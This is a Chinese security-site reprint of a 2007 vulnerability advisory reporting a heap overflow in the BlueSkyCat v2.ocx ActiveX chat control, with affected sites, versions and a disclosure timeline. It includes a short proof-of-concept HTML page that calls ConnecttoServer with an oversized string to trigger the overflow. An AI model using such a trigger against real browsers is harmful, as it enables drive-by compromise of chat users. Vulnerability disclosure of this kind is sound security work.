首页
|
安全文章
|
安全工具
|
Exploits
|
本站原创
|
关于我们
|
网站地图
|
安全论坛
当前位置:
主页
>
安全文章
>
文章资料
>
漏洞资料
>文章内容
数千万聊天用户遇到挂马危险--BlueSkyCat ActiveX远程代码执行漏洞
来源:http://www.vulnhunt.com/ 作者:CodeAuditLabs 发布时间:2007-08-03
CAL-20070730-1 BlueSkyCat ActiveX远程代码执行漏洞
我们是代码审计实验室(Code Audit Labs
http://www.vulnhunt.com/
).
为保护客户安全,我们对"蓝天专业可视语音聊天系统"blueskycat v2.ocx
(version 8.1.2.0) 文件做了下内部审计。blueskycat是应用广泛的语音和
视频聊天室软件,由blueSky.cn开发.
发现几处v2.ocx ActiveX的安全漏洞,远程攻击者可能利用此漏洞控制用户机器。
该文原始连接
1:
http://www.vulnhunt.com/advisories/CAL-20070730-1_BlueSkyCat_v2.ocx_ActiveX_remote_heap_overflow_vulnerability.txt
2:
http://CodeAudit.blogspot.com
CVE:
====
We request a CVE number to assign to this vulnerability.
细节:
=====
BlueSkyCat所安装的v2.ocx控件中的ConnecttoServer函数没有正确验证用户输入
参数,如果用户受骗访问了恶意页面的话,就可能触发堆溢出,导致执行任意指令。
从而控制安装有受影响版本的BlueSkyCat软件的用户机器。
以下您的客户的客户的机器都会受到影响
碧聊
http://www.bliao.com
QQ聊
http://www.qqliao.com
七聊
http://www.7liao.com
好聊
http://www.haoliao.net
我要聊
http://chat.51liao.net
圣域佛教
http://www.heshang.net
喜满你
http://vchat.xicn.net
CN104
http://www.cn104.com
学聊
http://www.liao-tian.com
情聊
http://www.aliao.net
快聊
http://www.kuailiao.com
模特聊
http://www.mtliao.com
北国娱乐网
http://www.pj0427.com
维语聊
http://chat.uighur.cn
舞魅聊
http://www.wmliao.com
受影响版本:
===========
v2.ocx version 8.1.2.0(当前最新版本) 和以前版本
厂家:
=====
BlueSky
测试代码:
========
<html>
<head>
<OBJECT ID="com" CLASSID="CLSID:{2EA6D939-4445-43F1-A12B-8CB3DDA8B855}">
</OBJECT>
</head>
<body>
<SCRIPT language="javascript">
function ClickForRunCalc()
{
var heapSprayToAddress = 0x0d0d0d0d;
var payLoadCode = "A" ;
while (payLoadCode.length <= 10000) payLoadCode+='A';
com.ConnecttoServer("1",payLoadCode,"3","4","5");
}
</script>
<button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>
代码审计实验室建议:
==================
Code Audit Labs建议厂家自己进行一次全面的代码安全检查(Code Audit or Code
Review),同时我们Code Audit Labs也提供代码审计(Code Audit)服务,假如您需要
我们的服务,请联系
mailto:Vulnhunt@gmail.com?subject=request code review service.
同时,为保护您所创建的价值,我们会等到您修复该漏洞后公告该漏洞。
假如您申请我们的Code Audit服务,那么,我们有义务为您保持该信息。
由于一些网站不能自动更新程序,建议用户手动到
http://www.bluesky.cn
下载更新包。
时间表:
======
1: 2007-07-29 通知厂家 (mail to blueskychat@gmail.com)
2: 2007-07-29 厂家回复说已经升级。
3: 2007-07-30 经过我们的确认,bluesky的客户都还没有升级他们的程序。
都还处在危险之中,发信通知vendor)
4: 2007-07-31 发布该漏洞
关于我们:
=========
代码审计实验室(Code Audit Labs)致力于自动化代码审计(包括源代码和二进制代码)
研究和开发,为提高软件安全测试的效率以及软件代码质量不懈努力.
Code Audit Labs信念: "您为客户创造价值,我们保护您创造的价值。"
http://www.VulnHunt.com
EOF
[
推荐
] [
评论(0条)
]
[返回顶部]
[打印本页]
[关闭窗口]
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
§最新评论:
热点文章
·
XSOK环境变量本地命令执行漏洞
·
N点虚拟主机管理系统 致命漏洞。
·
南方数据企业网站管理系统V10.0
·
动网(DVBBS)Version 8.2.0 后
·
Solaris 10 telnet漏洞及解决
·
破解无线路由器密码,常见无线密
·
Nginx %00空字节执行php漏洞
·
WinWebMail、7I24提权漏洞
·
XPCD xpcd-svga本地缓冲区溢出漏
·
Struts2多个漏洞简要分析
·
ecshop2.72 api.php 文件鸡肋注
·
Discuz!后台拿Webshell 0day
相关文章
·
百度超级搜霸远程代码执行漏洞
·
firefox惊爆0day高危漏洞:Cross
·
Discuz! 5.5 0324 跨站漏洞
·
利用Yahoo! Messenger 8.1.0 Act
·
0day-java加载任意目录库文件(ja
·
RealPlayer 6.0.10 到 6.0.14 整
·
Solaris 10 telnet漏洞及解决
·
windows 再暴输入法安全风险
·
IBM WebSphere应用服务器源码泄
·
警告!Symantec存在远程执行漏洞0
·
Tomcat URI Stack Overflow
·
Advanced Heap Spray Technique
推荐广告
CopyRight © 2002-2022
VFocuS.Net
All Rights Reserved